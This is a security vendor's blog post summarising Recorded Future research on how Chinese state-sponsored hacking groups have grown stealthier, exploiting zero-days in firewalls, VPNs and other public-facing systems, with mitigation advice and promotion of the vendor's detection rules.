China-Backed APT Attack Detection: Withstanding the Escalating Sophistication & Maturity of Chinese State-Sponsored Offensive Operations Based on the Recorded Future’s Insikt Group Research
Table of contents:
In the last five years, Chinese nation-backed offensive campaigns have evolved into more sophisticated, stealthy, and well-coordinated threats as compared to previous years. This transformation is characterized by the extensive exploitation of zero-days and known vulnerabilities in publicly accessible security and network instances. Additionally, there is a stronger focus on operational security, aimed at reducing the signs of intrusion, which attackers achieve by leveraging a set of adversary detection evasion techniques backed by LOLbins and anonymization networks. The shift in Chinese nation-backed offensive operations towards enhanced stealth and operational security has given rise to a more intricate and demanding cyber threatscape for organizations in multiple industry vectors, including the public sector, and the global cyber defender community.
This article gains insight into how China has evolved into the leading cyber power on a global scale based on the dedicated report from Recorded Future’s Insikt Group and provides defenders with curated detection algorithms to proactively defend against escalating attacks by China-linked state-sponsored malicious actors.Â
Detecting Chinese Nation-Backed APT Attacks Covered in the Research by Recorded Future
Over the past decade, China-backed state-sponsored actors made a significant shift in the sophistication of their offensive tactics, techniques, and procedures (TTPs). According to the inquiry by Insikt Group, Chinese hackers tend to be more strategic and stealthier, relying on zero-days and known vulnerabilities in publicly accessible appliances. Also, they leverage large-scale anonymized networks consisting of compromised IoT devices or virtual private server installations along with open-source families and exploits to fly under the radar and avoid identification. Notably, China-affiliated actors are observed to use shared intelligence & offensive infrastructure while continuously exchanging knowledge and experience.Â
To act faster than adversaries, cyber defenders should collaborate for better risk assessment and accurate prioritization, along with relevant detection and mitigation strategies. Rely on SOC Prime’s Platform for collective cyber defense to obtain curated detection content addressing TTPs widely used by Chinese state-sponsored groups.
Sigma Rules To Detect Commonly Observed TTPs Associated With Chinese State-Sponsored Activity
Additionally, security professionals can browse SOC Prime Pltafrom to obtain a dedicated detection stack aimed at identifying zero-day exploits leveraged by China-backed groups. Just follow the link below and drill down to an extensive rule list compatible with 28 SIEM, EDR, XDR, and Data Lake technologies, mapped to MITRE ATT&CK framework, and enriched with relevant CTI & metadata.
To obtain the full list of rules addressing TTPs described in the report from Recorded Future’s Insikt Group, hit the Explore Detections button. Security professionals can obtain in-depth intelligence accompanied by ATT&CK references and CTI links to streamline threat investigation and boost SOC productivity.
Analysis of the Chinese State-Sponsored APT Attack Transformation Based on the Insikt Group Research
China has been conducting malicious campaigns for years, targeting U.S. and global organizations across various industries to gather intelligence and sensitive data, with destructive attacks linked to state-sponsored APT groups like Mustang Panda or APT41.
The enhanced scope of China-linked attacks and their growing sophistication fuel the need for strengthening collective cyber defense to withstand the coordinated offensive forces. In late spring 2023, NSA, CISA, and FBA, along with other U.S. and international authorities, issued a joint cybersecurity advisory to raise cybersecurity awareness of a surge in malicious activity attributed to the Chinese nation-backed APT known as Volt Typhoon and targeting the U.S. critical infrastructure.
Chinese nation-backed cyber-enabled operations are primarily conducted by the military divisions, including the People’s Liberation Army Strategic Support Force (PLASSF) and the Ministry of State Security (MSS). Over the past half-decade, Chinese APT groups have been mainly setting their eyes on military and political intelligence, as well as shifting their focus toward the support for strategic economic and policy objectives, and targeting perceived internal threats, including ethnic and religious minorities.Â
China-backed threat groups have significantly shifted their focus to exploiting vulnerabilities in public-facing systems since at least 2021. During this period, over 85% of the zero-day vulnerabilities exploited by Chinese state-sponsored groups were found in public-facing systems, including firewalls, enterprise VPN products, hypervisors, load balancers, and email security products. Among critical vulnerabilities exploited by suspected Chinese nation-backed groups are CVE-2023-22515 in Confluence Data Center and Server, an RCE Zero-Day in Citrix NetScaler tracked as CVE-2023-3519, and CVE-2022-42475, a nefarious zero-day vulnerability in Fortinet FortiOS SSL-VPN. Given the ongoing migration of organizations to cloud-based environments, there is likely to be an increased emphasis on targeting these environments in the near future.
In addition to weaponizing zero-days and known vulnerabilities, Chinese state-sponsored hacking collectives massively adopt large-scale anonymization networks for reconnaissance, exploitation, and C2 infrastructure. The shift toward a more sophisticated and stealthier adversary activity involves using open-source malware families and exploits, as well as custom malware samples tailored for public-facing software to maintain persistence.
As potential mitigation measures provided by the Recorded Future’s Insikt Group researchers, organizations and individual users are recommended to reduce vulnerability exposure with timely patching and continuously prioritize critical vulnerabilities, specifically, RCE security flaws in public-facing entities. Following network segmentation best practices, enabling multi-factor authentication, and constantly keeping up with updates and guidelines on mitigating common TTPs related to China-backed APT activity are also essential for defenders to minimize the risks of intrusions.
In view of the increasing sophistication of Chinese adversary capabilities supported by the country’s government over the last half-decade, China is highly likely to strengthen its position in the cyber front by enhancing its cyber warfare and expanding the scope of attacks. Rely on SOC Prime and reach over 500+ curated detection algorithms against current and emerging APT attacks of any scope and scale to continuously reinforce your cyber resilience.